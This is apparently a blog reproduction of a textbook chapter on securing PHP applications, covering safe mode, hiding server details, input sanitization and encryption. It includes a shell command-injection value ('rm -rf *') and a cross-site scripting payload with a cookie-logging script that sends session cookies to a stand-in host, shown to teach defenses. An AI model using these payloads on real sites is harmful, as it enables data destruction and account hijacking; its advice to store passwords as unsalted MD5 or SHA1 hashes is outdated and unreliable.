Tuesday, July 14, 2009

Beginning PHP and Oracle From Novice to Professional by W. Jason Gilmore and Bob Bryla Chapter 21

Any Web site can be thought of as a castle under constant attack by a sea of barbarians. And as the history of both conventional and information warfare shows, often the attackers’ victory isn’t entirely
dependent upon their degree of skill or cunning, but rather on an oversight by the defenders. As keepers of the electronic kingdom, you’re faced with no small number of potential ingresses from which havoc can be wrought, perhaps most notably the following:

Software vulnerabilities: Web applications are constructed from numerous technologies, typi- cally a database server, a Web server, and one or more programming languages, all of which could be running on one or more operating systems. Therefore, it’s crucial to constantly keep abreast of exposed vulnerabilities and take the steps necessary to patch the problem before someone takes advantage of it.

User input: Exploiting ways in which user input is processed is perhaps the easiest way to cause serious damage to your data and application, an assertion backed up by the numerous reports of attacks launched on high-profile Web sites in this manner. Manipulation of data passed via Web forms, URL parameters, cookies, and other readily accessible routes enables attackers to strike the very heart of your application logic.

Poorly protected data: Data is the lifeblood of your company; lose it at your own risk. All too often, database and Web accounts are left unlocked or protected by questionable passwords. Or access to Web-based administration applications is available through an easily identifiable URL. These sorts of security gaffes are unacceptable, particularly because they are so easily resolved.

Because each scenario poses significant risk to the integrity of your application, all must be thoroughly investigated and handled accordingly. In this chapter, we review many of the steps you can take to hedge against and even eliminate these dangers.

Configuring PHP Securely

PHP offers a number of configuration parameters that are intended to greatly increase its level of security awareness. This section introduces many of the most relevant options.

Safe Mode

If you’re running a version of PHP earlier than PHP 6, safe mode will be of particular interest if you’re running PHP in a shared-server environment. When enabled, safe mode always verifies that the executing script’s owner matches the owner of the file that the script is attempting to open. This prevents the unintended execution, review, and modification of files not owned by the executing user, provided that the file privileges are also properly configured to prevent modification. Enabling

387

safe mode also has other significant effects on PHP’s behavior, in addition to diminishing, or even disabling, the capabilities of numerous standard PHP functions. These effects and the numerous safe mode–related parameters that comprise this feature are discussed in this section.

■Caution As of version 6, safe mode is no longer available. See Chapter 2 for more information.

safe_mode = On | Off

Scope: PHP_INI_SYSTEM; Default value: Off
Enabling the safe_mode directive places restrictions on several potentially dangerous language features when using PHP in a shared environment. You can enable safe_mode by setting it to the Boolean value of On, or disable it by setting it to Off. Its restriction scheme is based on comparing the UID (user ID) of the executing script and the UID of the file that the script is attempting to access.
If the UIDs are the same, the script can execute; otherwise, the script fails.
Specifically, when safe mode is enabled, several restrictions come into effect:

• Use of all input/output functions (e.g., fopen(), file(), and require()) is restricted to files that have the same owner as the script that is calling these functions. For example, assuming that safe mode is enabled, if a script owned by Mary calls fopen() and attempts to open a file owned by John, it will fail. However, if Mary owns both the script calling fopen() and the file called by fopen(), the attempt will be successful.
• Attempts by a user to create a new file will be restricted to creating the file in a directory owned by the user.
• Attempts to execute scripts via functions such as popen(), system(), or exec() are only possible when the script resides in the directory specified by the safe_mode_exec_dir configuration directive. This directive is discussed later in this section.
• HTTP authentication is further strengthened because the UID of the owner of the authentica- tion script is prepended to the authentication realm. Furthermore, the PHP_AUTH variables are not set when safe mode is enabled.
• If using the MySQL database server, the username used to connect to a MySQL server must be the same as the username of the owner of the file calling mysql_connect().

The following is a complete list of functions, variables, and configuration directives that are affected when the safe_mode directive is enabled:

• apache_request_headers() • mail()

• backticks() and the backtick operator • max_execution_time()

• chdir() • mkdir()

• chgrp() • move_uploaded_file()

• chmod() • mysql_*

• chown() • parse_ini_file()

• copy() • passthru()

• dbase_open() • pg_lo_import()

• dbmopen() • popen()

• dl() • posix_mkfifo()

• exec() • putenv()

• filepro() • rename()

• filepro_retrieve() • rmdir()

• filepro_rowcount() • set_time_limit()

• fopen() • shell_exec()

• header() • show_source()

• highlight_file() • symlink()

• ifx_* • system()

• ingres_* • touch()

• link() • unlink()

safe_mode_gid = On | Off

Scope: PHP_INI_SYSTEM; Default value: 0ff
This directive changes safe mode’s behavior from verifying UIDs before execution to verifying group IDs. For example, if Mary and John are in the same user group, Mary’s scripts can call fopen() on John’s files.

safe_mode_include_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
You can use safe_mode_include_dir to designate various paths in which safe mode will be ignored if it’s enabled. For instance, you might use this function to specify a directory containing various templates that might be incorporated into several user Web sites. You can specify multiple directories by separating each with a colon on Unix-based systems, and a semicolon on Windows.
Note that specifying a particular path without a trailing slash will cause all directories falling under that path to also be ignored by the safe mode setting. For example, setting this directive to
/home/configuration means that /home/configuration/templates/ and /home/configuration/ passwords/ are also exempt from safe mode restrictions. Therefore, if you’d like to exclude just a single directory or set of directories from the safe mode settings, be sure to conclude each with the trailing slash.

safe_mode_allowed_env_vars = string

Scope: PHP_INI_SYSTEM; Default value: "PHP_"
When safe mode is enabled, you can use this directive to allow certain environment variables to be modified by the executing user’s script. You can allow multiple variables to be modified by sepa- rating each with a comma.

safe_mode_exec_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
This directive specifies the directories in which any system programs reside that can be executed by functions such as system(), exec(), or passthru(). Safe mode must be enabled for this to work. One

odd aspect of this directive is that the forward slash (/) must be used as the directory separator on all operating systems, Windows included.

safe_mode_protected_env_vars = string

Scope: PHP_INI_SYSTEM; Default value: LD_LIBRARY_PATH
This directive protects certain environment variables from being changed with the putenv() function. By default, the variable LD_LIBRARY_PATH is protected because of the unintended consequences that may arise if this is changed at run time. Consult your search engine or Linux manual for more information about this environment variable. Note that any variables declared in this section will override anything declared by the safe_mode_allowed_env_vars directive.

Other Security-Related Configuration Parameters

This section introduces several other configuration parameters that play an important role in better securing your PHP installation.

disable_functions = string

Scope: PHP_INI_SYSTEM; Default value: NULL
For some, enabling safe mode might seem a tad overbearing. Instead, you might want to just disable a few functions. You can set disable_functions equal to a comma-delimited list of function names that you want to disable. Suppose that you want to disable just the fopen(), popen(), and file() functions. Set this directive like so:

disable_functions = fopen,popen,file

disable_classes = string

Scope: PHP_INI_SYSTEM; Default value: NULL
Given the new functionality offered by PHP’s embrace of the object-oriented paradigm, it likely won’t be too long before you’re using large sets of class libraries. However, there may be certain classes found within these libraries that you’d rather not make available. You can prevent the use
of these classes with the disable_classes directive. For example, suppose you want to completely
disable the use of two classes, named administrator and janitor:

disable_classes = "administrator, janitor"

display_errors = On | Off

Scope: PHP_INI_ALL; Default value: On
When developing applications, it’s useful to be immediately notified of any errors that occur during script execution. PHP will accommodate this need by outputting error information to the browser window. However, this information could possibly be used to reveal potentially damaging details about your server configuration or application. Therefore, when the application moves to a production environment, be sure to disable this directive. You can, of course, continue reviewing these error messages by saving them to a log file or using some other logging mechanism. See Chapter 8 for more information about PHP’s logging features.

doc_root = string

Scope: PHP_INI_SYSTEM; Default value: NULL

This directive can be set to a path that specifies the root directory from which PHP files will be served. If the doc_root directive is set to nothing (empty), it is ignored, and the PHP scripts are executed exactly as the URL specifies.

max_execution_time = integer

Scope: PHP_INI_ALL; Default value: 30
This directive specifies how many seconds a script can execute before being terminated. This can be useful to prevent users’ scripts from consuming too much CPU time. If max_execution_time is set to 0, no time limit will be set.

memory_limit = integer

Scope: PHP_INI_ALL; Default value: 8M
This directive specifies, in megabytes, how much memory a script can use. Note that you cannot specify this value in terms other than megabytes, and that you must always follow the number with an M. This directive is only applicable if --enable-memory-limit is enabled when you configure PHP.

open_basedir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
PHP’s open_basedir directive can establish a base directory to which all file operations will be restricted, much like Apache’s DocumentRoot directive. This prevents users from entering otherwise restricted areas of the server. For example, suppose all Web material is located within the directory
/home/www. To prevent users from viewing and potentially manipulating files such as /etc/passwd via a few simple PHP commands, consider setting open_basedir like so:

open_basedir = "/home/www/"

sql.safe_mode = integer

Scope: PHP_INI_SYSTEM; Default value: 0
When enabled, sql.safe_mode ignores all information passed to mysql_connect() and mysql_ pconnect(), instead using localhost as the target host. The user under which PHP is running is used as the username (quite likely the Apache daemon user), and no password is used. Note that this directive has nothing to do with the safe mode feature found in versions of PHP earlier than 6.0; their only similarity is the name.

user_dir = string

Scope: PHP_INI_SYSTEM; Default value: NULL
This directive specifies the name of the directory in a user’s home directory where PHP scripts must be placed in order to be executed. For example, if user_dir is set to scripts and user Johnny wants to execute somescript.php, Johnny must create a directory named scripts in his home directory and place somescript.php in it. This script can then be accessed via the URL http://www.example.com/
~johnny/scripts/somescript.php. This directive is typically used in conjunction with Apache’s
UserDir configuration directive.

Hiding Configuration Details

Many programmers prefer to wear their decision to deploy open source software as a badge for the world to see. However, it’s important to realize that every piece of information you release about

your project may provide an attacker with vital clues that can ultimately be used to penetrate your server. That said, consider an alternative approach of letting your application stand on its own merits while keeping quiet about the technical details whenever possible. Although obfuscation is only a part of the total security picture, it’s nonetheless a strategy that should always be kept in mind.

Hiding Apache

Apache outputs a server signature included within all document requests and within server-generated documents (e.g., a 500 Internal Server Error document). Two configuration directives are responsible for controlling this signature: ServerSignature and ServerTokens.

Apache’s ServerSignature Directive

The ServerSignature directive is responsible for the insertion of that single line of output pertaining to Apache’s server version, server name (set via the ServerName directive), port, and compiled-in modules. When enabled and working in conjunction with the ServerTokens directive (introduced
next), it’s capable of displaying output like this:

Apache/2.0.59 (Unix) DAV/2 PHP/6.0.0-dev Server at www.example.com Port 80

Chances are you would rather keep such information to yourself. Therefore, consider disabling this directive by setting it to Off.

Apache’s ServerTokens Directive
The ServerTokens directive determines which degree of server details is provided if the ServerSignature directive is enabled. Six options are available: Full, Major, Minimal, Minor, OS, and Prod. An example of each is given in Table 21-1.

Table 21-1. Options for the ServerTokens Directive

Option Example
Full Apache/2.0.59 (Unix) DAV/2 PHP/6.0.0-dev

Major Apache/2

Minimal Apache/2.0.59

Minor Apache/2.0

OS Apache/2.0.59 (Unix)

Prod Apache

Although this directive is moot if ServerSignature is disabled, if for some reason ServerSignature
must be enabled, consider setting the directive to Prod.

Hiding PHP

You can also hide, or at least obscure, the fact that you’re using PHP to drive your site. Use the expose_php directive to prevent PHP version details from being appended to your Web server signa- ture. Block access to phpinfo() to prevent attackers from learning your software version numbers and other key bits of information. Change document extensions to make it less obvious that pages map to PHP scripts.

expose_php = On | Off

Scope: PHP_INI_SYSTEM; Default value: On
When enabled, the PHP directive expose_php appends its details to the server signature. For example, if ServerSignature is enabled and ServerTokens is set to Full, and this directive is enabled, the relevant component of the server signature would look like this:

Apache/2.0.44 (Unix) DAV/2 PHP/5.0.0b3-dev Server at www.example.com Port 80

When expose_php is disabled, the server signature will look like this:

Apache/2.0.44 (Unix) DAV/2 Server at www.example.com Port 80

Remove All Instances of phpinfo() Calls

The phpinfo() function offers a great tool for viewing a summary of PHP’s configuration on a given server. However, left unprotected on the server, the information it provides is a gold mine for attackers. For example, this function provides information pertinent to the operating system, the PHP and Web server versions, and the configuration flags, and a detailed report regarding all available extensions and their versions. Leaving this information accessible to an attacker will greatly increase the likelihood that a potential attack vector will be revealed and subsequently exploited.
Unfortunately, it appears that many developers are either unaware of or unconcerned with such disclosure because typing phpinfo.php into a search engine yields roughly 336,000 results, many of which point directly to a file executing the phpinfo() command, and therefore offering a bevy of information about the server. A quick refinement of the search criteria to include other key terms results in a subset of the initial results (old, vulnerable PHP versions) that would serve as prime candidates for attack because they use known insecure versions of PHP, Apache, IIS, and various supported extensions.
Allowing others to view the results from phpinfo() is essentially equivalent to providing the general public with a road map to many of your server’s technical characteristics and shortcomings. Don’t fall victim to an attack simply because you’re too lazy to remove or protect this file.

Change the Document Extension

PHP-enabled documents are often easily recognized by their unique extensions, of which the most common include .php, .php3, and .phtml. Did you know that this can easily be changed to any other extension you wish, even .html, .asp, or .jsp? Just change the line in your httpd.conf file that reads

AddType application/x-httpd-php .php

by adding whatever extension you please, for example

AddType application/x-httpd-php .asp

Of course, you’ll need to be sure that this does not cause a conflict with other installed server technologies.

Hiding Sensitive Data

Any document located in a Web server’s document tree and possessing adequate privilege is fair game for retrieval by any mechanism capable of executing the GET command, even if it isn’t linked from another Web page or doesn’t end with an extension recognized by the Web server. Not convinced? As an exercise, create a file and inside this file type my secret stuff. Save this file into your public HTML directory under the name of secrets with some really strange extension such as .zkgjg. Obviously, the server isn’t going to recognize this extension, but it’s going to attempt to serve up the data anyway. Now go to your browser and request that file, using the URL pointing to that file. Scary, isn’t it?
Of course, the user would need to know the name of the file he’s interested in retrieving. However, just like the presumption that a file containing the phpinfo() function will be named phpinfo.php, a bit of cunning and the ability to exploit deficiencies in the Web server configuration are all one really needs to have to find otherwise restricted files. Fortunately, there are two simple ways to definitively correct this problem, both of which are described in this section.

Hiding the Document Root

Inside Apache’s httpd.conf file, you’ll find a configuration directive named DocumentRoot. This is set to the path that you would like the server to consider to be the public HTML directory. If no other safeguards have been undertaken, any file found in this path and assigned adequate persmissions is capable of being served, even if the file does not have a recognized extension. However, it is not possible for a user to view a file that resides outside of this path. Therefore, consider placing your configuration files outside of the DocumentRoot path.
To retrieve these files, you can use include() to include those files into any PHP files. For example, assume that you set DocumentRoot like so:
DocumentRoot C:/apache2/htdocs # Windows
DocumentRoot /www/apache/home # Unix

Suppose you’re using a logging package that writes site access information to a series of text files. You certainly wouldn’t want anyone to view those files, so it would be a good idea to place them outside of the document root. Therefore, you could save them to some directory residing outside of the previous paths:

C:/Apache/sitelogs/ # Windows
/usr/local/sitelogs/ # Unix

Denying Access to Certain File Extensions

A second way to prevent users from viewing certain files is to deny access to certain extensions by configuring the httpd.conf file Files directive. Assume that you don’t want anyone to access files having the extension .inc. Place the following in your httpd.conf file:
<Files *.inc>
Order allow,deny
Deny from all
</Files>

After making this addition, restart the Apache server and you will find that access is denied to any user making a request to view a file with the extension .inc via the browser. However, you can still include these files in your scripts. Incidentally, if you search through the httpd.conf file, you will see that this is the same premise used to protect access to .htaccess.

Sanitizing User Data

Neglecting to review and sanitize user-provided data at every opportunity could provide attackers the opportunity to do massive internal damage to your application, data, and server, and even steal the identity of unsuspecting site users. This section shows you just how significant this danger is by demonstrating two attacks left open to Web sites whose developers have chosen to ignore this necessary safeguard. The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting. This section concludes with an introduction to a few easy data validation solutions that will help remedy this important matter.

File Deletion

To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventorymgr that hasn’t yet been ported to PHP. Executing such an application by way of PHP requires use of a command execution function such as exec() or system(). The inventorymgr application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventorymgr:

$sku = "50XCH67YU";
$inventory = "50";
exec("/opt/inventorymgr ".$sku." ".$inventory);

Now suppose the pastry chef has become deranged from sniffing an overabundance of oven fumes and decides to attempt to destroy the Web site by passing the following string in as the recom- mended quantity to reorder:

50; rm -rf *

This results in the following command being executed in exec():

exec("/opt/inventorymgr 50XCH67YU 50; rm -rf *");

The inventorymgr application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides.

Cross-Site Scripting

The previous scenario demonstrates just how easily valuable site files could be deleted should user data not be filtered. While it’s possible that damage from such an attack could be minimized by restoring a recent backup of the site and corresponding data, it would be considerably more difficult to recover from the damage resulting from the attack demonstrated in this section because it involves the betrayal of a site user that has otherwise placed his trust in the security of your Web site. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by

other users (e.g., an online bulletin board). Merely visiting this page can result in the transmission of data to a third party’s site, which could allow the attacker to later return and impersonate the unwit- ting visitor. Let’s set up the environment parameters that welcome such an attack.
Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom-built forum online, it decided to forgo sanitization of user input, figuring it could take care of such matters at a later point in time. One unscrupulous customer decides to attempt to retrieve the session keys (stored in cookies) of other customers, which could subsequently be used to enter their accounts. Believe it or not, this is done with just a bit of HTML and JavaScript that can forward all forum visi- tors’ cookie data to a script residing on a third-party server. To see just how easy it is to retrieve cookie data, navigate to a popular Web site such as Yahoo! or Google and enter the following into the browser address bar:

javascript:void(alert(document.cookie))

You should see all of your cookie information for that site posted to a JavaScript alert window similar to that shown in Figure 21-1.

Figure 21-1. Displaying cookie information from a visit to http://www.news.com

Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a Web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker does exactly this, using the forum’s comment-posting tool to add the following string to the forum page:
<script>
document.location = 'http://www.example.org/logger.php?cookie=' +
document.cookie
</script>

The logger.php file might look like this:

<?php
// Assign GET variable
$cookie = $_GET['cookie'];

// Format variable in easily accessible manner
$info = "$cookie\n\n";

// Write information to file
$fh = @fopen("/home/cookies.txt", "a");
@fwrite($fh, $info);

// Return to original site
header("Location: http://www.example.com");
?>

Provided the e-commerce site isn’t comparing cookie information to a specific IP address, a safeguard that is all too uncommon, all the attacker has to do is assemble the cookie data into a format supported by her browser, and then return to the site from which the information was culled. Chances are she’s now masquerading as the innocent user, potentially making unauthorized purchases with her credit card, further defacing the forums, and even wreaking other havoc.

Sanitizing User Input: The Solution

Given the frightening effects that unchecked user input can have on a Web site and its users, one would think that carrying out the necessary safeguards must be a particularly complex task. After all, the problem is so prevalent within Web applications of all types, prevention must be quite difficult, right? Ironically, preventing these types of attacks is really a trivial affair, accomplished by first passing the input through one of several functions before performing any subsequent task with it. Four standard functions are conveniently available for doing so: escapeshellarg(), escapeshellcmd(), htmlentities(),
and strip_tags().

■Note Keep in mind that the safeguards described in this section, and frankly throughout the chapter, while
effective, offer only a few of the many possible solutions at your disposal. For instance, in addition to the four functions described in this section, you could also typecast incoming data to make sure it meets the requisite types as expected by the application. Therefore, although you should pay close attention to what’s discussed in this chapter, you should also be sure to read as many other security-minded resources as possible to obtain a comprehensive understanding of the topic.

Escaping Shell Arguments

The escapeshellarg() function delimits its arguments with single quotes and escapes quotes. Its prototype follows:

string escapeshellarg(string arguments)

The effect is such that when arguments is passed to a shell command, it will be considered a single argument. This is significant because it lessens the possibility that an attacker could masquerade addi- tional commands as shell command arguments. Therefore, in the previously described file-deletion scenario, all of the user input would be enclosed in single quotes, like so:

/opt/inventorymgr '50XCH67YU' '50; rm -rf *'

Attempting to execute this would mean 50; rm -rf * would be treated by inventorymgr as the requested inventory count. Presuming inventorymgr is validating this value to ensure that it’s an integer, the call will fail and no real harm will be done.

Escaping Shell Metacharacters

The escapeshellcmd() function operates under the same premise as escapeshellarg(), but it sanitizes potentially dangerous input program names rather than program arguments. Its prototype follows:

string escapeshellcmd(string command)

This function operates by escaping any shell metacharacters found in the command. These metacharacters include #& ;`, |*? ~<> ^()[ ]{} $ \\.
You should use escapeshellcmd() in any case where the user’s input might determine the name of a command to execute. For instance, suppose the inventory-management application is modified

to allow the user to call one of two available programs, foodinventorymgr or supplyinventorymgr, by passing along the string food or supply, respectively, together with the SKU and requested amount. The exec() command might look like this:

exec("/opt/".$command."inventorymgr ".$sku." ".$inventory);

Assuming the user plays by the rules, the task will work just fine. However, consider what would happen if the user were to pass along the following as the value to $command:

blah; rm -rf *;
/opt/blah; rm -rf *; inventorymgr 50XCH67YU 50

This assumes the user also passes in 50XCH67YU and 50 as the SKU and inventory number, respec- tively. These values don’t matter anyway because the appropriate inventorymgr command will never be invoked since a bogus command was passed in to execute the nefarious rm command. However, if this material were to be filtered through escapeshellcmd() first, $command would look like this:

blah\; rm -rf \*;

This means exec() would attempt to execute the command /opt/blah rm -rf, which of course doesn’t exist.

Converting Input into HTML Entities

The htmlentities() function converts certain characters that have special meaning in an HTML context to strings that a browser can render as provided rather than execute them as HTML. Its prototype follows:

string htmlentities(string input [, int quote_style [, string charset]])

Five characters in particular are considered special by this function:

• & will be translated to &amp;

• " will be translated to &quot; (when quote_style is set to ENT_NOQUOTES)

• > will be translated to &gt;

• < will be translated to &lt;

• ' will be translated to ' (when quote_style is set to ENT_QUOTES)

Returning to the cross-site scripting example, if the user’s input is passed through htmlspecialchars() rather than embedded into the page and executed as JavaScript, the input would instead be displayed exactly as it is input because it would be translated like so:

&lt;script&gt;
document.location ='http://www.example.org/logger.php?cookie=' +
document.cookie
&lt;/script&gt;

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as is the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags(), which removes all HTML tags from a string. Its prototype follows:

string strip_tags(string str [, string allowed_tags])

The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags (<i></i>) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. An example follows:

<?php
$input = "I <td>really</td> love <i>PHP</i>!";
$input = strip_tags($input,"<i></i>");
// $input now equals "I really love <i>PHP</i>!"
?>

Taking Advantage of PEAR: Validate

While the functions described in the preceding section work well for stripping potentially malicious data from user input, what if you want to verify whether the provided data is a valid e-mail address (syntactically), or whether a number falls within a specific range? Because these are such common- place tasks, a PEAR package called Validate can perform these verifications and more. You can also install additional rules for validating the syntax of localized data, such as an Australian phone number, for instance.

Installing Validate

To take advantage of Validate’s features, you need to install it from PEAR. Therefore, start PEAR and pass along the following arguments:

%>pear install -a Validate-0.6.5

Starting to download Validate-0.6.5.tgz (16,296 bytes)
......done: 16,296 bytes downloading Date-1.4.6.tgz ...
Starting to download Date-1.4.6.tgz (53,535 bytes)
...done: 53,535 bytes
install ok: channel://pear.php.net/Date-1.4.6 install ok: channel://pear.php.net/Validate-0.6.5

The -a will result in the optional package dependency Date, also being installed. If you don’t plan on validating dates, you can omit this option. Also, in this example the version number is appended to the package; this is because at the time this was written, Validate was still in a beta state. Once it reaches a stable version there will be no need to include the version number.

Validating a String

Some data should consist only of numeric characters, alphabetical characters, a certain range of characters, or maybe even all uppercase or lowercase letters. You can validate such rules and more using Validate’s string() method:
<?php
// Include the Validate package require_once "Validate.php";

// Retrieve the provided username
$username = $_POST['username'];

// Instantiate the Validate class
$validate = new Validate();

// Determine if address is valid
if($validate->string($username, array("format" => VALIDATE_ALPHA, "min_length"=> "3", "max_length" => "15")))
echo "Valid username!";

else

?>

echo "The username must be between 3 and 15 characters in length!";

Validating an E-mail Address

Validating an e-mail address’s syntax is a fairly difficult matter, requiring the use of a somewhat complex regular expression. The problem is compounded with most users’ lack of understanding regarding what constitutes a valid address. For example, which of the following three e-mail addresses are invalid?

john++ilove-pizza@example.com john&sally4ever@example.com i.brake4_pizza@example.co.uk
You might be surprised to learn they’re all valid! If you don’t know this and attempt to imple- ment an e-mail validation function, it’s possible you could prevent a perfectly valid e-mail address from being processed. Why not leave it to the Validate package? Consider this example:

<?php

// Include the Validate package require_once "Validate.php";

// Retrieve the provided e-mail address
$email = $_POST['email'];

// Instantiate the Validate class
$validate = new Validate();

// Determine if address is valid if($validate->email($email))
echo "Valid e-mail address!";

else

?>

echo "Invalid e-mail address!";

You can also determine whether the address domain exists by passing the option check_domain
as a second parameter to the email() method, like this:

$validate->email($email, array("check_domain" => 1));

Data Encryption

Encryption can be defined as the translation of data into a format that is intended to be unreadable by anyone except the intended party. The intended party can then decode, or decrypt, the encrypted

data through the use of some secret—typically a secret key or password. PHP offers support for several encryption algorithms. Several of the more prominent ones are described here.

■Tip For more information about encryption, pick up the book Applied Cryptography: Protocols, Algorithms, and
Source Code in C, Second Edition by Bruce Schneier (John Wiley & Sons, 1995).

PHP’s Encryption Functions

Prior to delving into an overview of PHP’s encryption capabilities, it’s worth discussing one caveat to their usage, which applies regardless of the solution. Encryption over the Web is largely useless unless the scripts running the encryption schemes are operating on an SSL-enabled server. Why? PHP is a server-side scripting language, so information must be sent to the server in plain-text format before it can be encrypted. There are many ways that an unwanted third party can watch this information as it is transmitted from the user to the server if the user is not operating via a secured connection. For more information about setting up a secure Apache server, check out http://www.apache-ssl.org. If you’re using a different Web server, refer to your documentation. Chances are that there is at least one, if not several, security solutions for your particular server. With that caveat out of the way, let’s review PHP’s encryption functions.

Encrypting Data with the md5() Hash Function

The md5() function uses MD5, which is a third-party hash algorithm often used for creating digital signatures (among other things). Digital signatures can, in turn, be used to uniquely identify the sending party. MD5 is considered to be a one-way hashing algorithm, which means there is no way to dehash data that has been hashed using md5(). Its prototype looks like this:

string md5(string str)

The MD5 algorithm can also be used as a password verification system. Because it is (in theory) extremely difficult to retrieve the original string that has been hashed using the MD5 algorithm, you could hash a given password using MD5 and then compare that encrypted password against those that a user enters to gain access to restricted information.
For example, assume that your secret password toystore has an MD5 hash of
745e2abd7c52ee1dd7c14ae0d71b9d76. You can store this hashed value on the server and compare it to the MD5 hash equivalent of the password the user attempts to enter. Even if an intruder gets hold of the encrypted password, it wouldn’t make much difference because that intruder can’t return the string to its original format through conventional means. An example of hashing a string using md5() follows:
<?php
$val = "secret";
$hash_val = md5 ($val);
// $hash_val = "5ebe2294ecd0e0f08eab7690d2a6ee69";
?>

Remember that to store a complete hash, you need to set the field length to 32 characters. The md5() function will satisfy most hashing needs. There is another much more powerful
hashing alternative available via the mhash library. This library is introduced in the next section.

Using the mhash Library

mhash is an open source library that offers an interface to a wide number of hash algorithms. Authored by Nikos Mavroyanopoulos and Sascha Schumann, mhash can significantly extend PHP’s hashing capabilities. Integrating the mhash module into your PHP distribution is rather simple:

1. Go to http://mhash.sourceforge.net and download the package source.

2. Extract the contents of the compressed distribution and follow the installation instructions as specified in the INSTALL document.
3. Compile PHP with the --with-mhash option.

On completion of the installation process, you have the functionality offered by mhash at your disposal. This section introduces mhash(), the most prominent of the five functions made available to PHP when the mhash extension is included.

Hashing Data with mhash

The function mhash() offers support for a number of hashing algorithms, allowing developers to incorporate checksums, message digests, and various other digital signatures into their PHP appli- cations. Its prototype follows:

string mhash(int hash, string data [, string key])

Hashes are also used for storing passwords. mhash()currently supports the hashing algorithms listed here:

• ADLER32

• CRC32

• CRC32B

• GOST

• HAVAL

• MD4

• MD5

• RIPEMD128

• RIPEMD160

• SHA1

• SNEFRU

• TIGER

Consider an example. Suppose you want to immediately encrypt a user’s chosen password at the time of registration (which is typically a good idea). You could use mhash() to do so, setting the hash parameter to your chosen hashing algorithm, and data to the password you want to hash:

<?php
$userpswd = "mysecretpswd";
$pswdhash = mhash(MHASH_SHA1, $userpswd);
echo "The hashed password is: ".bin2hex($pswdhash);
?>

This returns the following:

The hashed password is: 07c45f62d68d6e63a9cc18a5e1871438ba8485c2

Note that you must use the bin2hex() function to convert the hash from binary mode to hexa- decimal so that it can be formatted in a fashion easily viewable within a browser.
Via the optional parameter key, mhash() is also capable of determining message integrity and
authenticity. If you pass in the message’s secret key, mhash() will validate whether the message has been tampered with by returning the message’s Hashed Message Authentication Code (HMAC). You can think of the HMAC as a checksum for encrypted data. If the HMAC matches the one that would be published along with the message, the message has arrived undisturbed.

The MCrypt Package

MCrypt is a popular data-encryption package available for use with PHP, providing support for two- way encryption (i.e., encryption and decryption). Before you can use it, you need to follow these installation instructions:

1. Go to http://mcrypt.sourceforge.net/ and download the package source.

2. Extract the contents of the compressed distribution and follow the installation instructions as specified in the INSTALL document.
3. Compile PHP with the --with-mcrypt option.

MCrypt supports a number of encryption algorithms, all of which are listed here:

• ARCFOUR

• ARCFOUR_IV

• BLOWFISH

• CAST

• CRYPT

• DES

• ENIGMA

• GOST

• IDEA

• LOKI97

• MARS

• PANAMA

• RC (2, 4)

• RC6 (128, 192, 256)

• RIJNDAEL (128, 192, 256)

• SAFER (64, 128, and PLUS)

• SERPENT (128, 192, and 256)

• SKIPJACK

• TEAN

• THREEWAY

• 3DES

• TWOFISH (128, 192, and 256)

• WAKE

• XTEA

This section introduces just a sample of the more than 35 functions made available via this PHP
extension. For a complete introduction, consult the PHP manual.

Encrypting Data with MCrypt

The mcrypt_encrypt() function encrypts the provided data, returning the encrypted result. The prototype follows:

string mcrypt_encrypt(string cipher, string key, string data, string mode [, string iv])
The provided cipher names the particular encryption algorithm, and the parameter key determines the key used to encrypt the data. The mode parameter specifies one of the six available encryption modes: electronic codebook, cipher block chaining, cipher feedback, 8-bit output feedback, N-bit output feedback, and a special stream mode. Each is referenced by an abbreviation: ecb, cbc, cfb, ofb, nofb, and stream, respectively. Finally, the iv parameter initializes cbc, cfb, ofb, and certain algo- rithms used in stream mode. Consider an example:
<?php
$ivs = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_CBC);
$iv = mcrypt_create_iv($ivs, MCRYPT_RAND);
$key = "F925T";
$message = "This is the message I want to encrypt.";
$enc = mcrypt_encrypt(MCRYPT_DES, $key, $message, MCRYPT_MODE_CBC, $iv);
echo bin2hex($enc);
?>

This returns the following:

f5d8b337f27e251c25f6a17c74f93c5e9a8a21b91f2b1b0151e649232b486c93b36af467914bc7d8

You can then decrypt the text with the mcrypt_decrypt() function, introduced next.

Decrypting Data with MCrypt

The mcrypt_decrypt() function decrypts a previously encrypted cipher, provided that the cipher, key, and mode are the same as those used to encrypt the data. Its prototype follows:
string mcrypt_decrypt(string cipher, string key, string data, string mode [, string iv])

Go ahead and insert the following line into the previous example, directly after the last statement:

echo mcrypt_decrypt(MCRYPT_DES, $key, $enc, MCRYPT_MODE_CBC, $iv);

This returns the following:

This is the message I want to encrypt.

The methods in this section are only those that are in some way incorporated into the PHP extension set. However, you are not limited to these encryption/hashing solutions. Keep in mind that you can use functions such as popen() or exec() with any of your favorite third-party encryption technologies, for example, PGP (http://www.pgpi.org/) or GPG (http://www.gnupg.org/).

Summary

Hopefully the material presented in this chapter provided you with a few important tips and, more importantly, got you thinking about the many attack vectors that your application and server face. However, it’s important to understand that the topics described in this section are but a tiny sliver of the total security pie. If you’re new to the subject, take some time to learn more about some of the more prominent security-related Web sites.
